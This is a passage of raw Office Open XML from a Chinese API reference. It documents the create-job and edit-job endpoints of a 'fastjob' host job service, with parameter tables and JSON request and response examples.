            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AF7B447" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BCBEC33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0DCD5D72" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D23A1A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AFD6082" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="356C10CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4AB91306" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A869125" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="377AEACB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="018E49FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="391BBC27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780DE37B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/fastjob/job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DCD22E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"testxxxx"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"osType"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"description"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"description xxx"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"realm"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"type"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"realmName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"全部主机"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"taskType"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"taskId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"0478ee5024763edc6d3c"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"taskParams"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"cron"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"cronEnable"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D780925" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0103D9DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">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b568b67657c1b743cf33b"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"createdTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-07-02 21:05:11"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC9ABDC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>返回部分说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1399"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="45E10C2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2D2CFB8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C779F0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="141D5F63" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7D2D9079" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="659B9D3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DEC1709" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="053C8100" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="40752C3B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="580C69FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>createdTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F4B0ECF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D841DBA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>创建时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A2EAE18" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="198" w:name="编辑作业"/>
      <w:bookmarkEnd w:id="197"/>
      <w:r>
        <w:t>编辑作业</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD9C6AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA7D3A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>PUT /external/api/fastjob/job/{jobId}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6EC033"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341"/>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="4123"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="09E96C4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CD02FE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19CAA6C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E6D15C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4072EEF5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AECAD39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44BE4916" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5306A19D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="08A062B5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14460E90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EA970D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2559FF35" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5719F834" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BF7740D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F2BD657" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FCA8340" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统类型(必填)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6F03D03F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A53C772" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B17311D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63C3F110" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="74DAD7EA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0058EE23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EB461E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="191C7C57" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="53607EE7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A9A22B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5631D5B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50E09928" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业执行范围描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5073AE9A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37F148EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E8759E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="698FE5E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务类型 1. 系统内置任务, 2, 用户添加任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="05E8CD5E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00FE2211" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="306D8AAB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="756D8734" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="714F361B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F1B4792" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskParams</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64957D42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
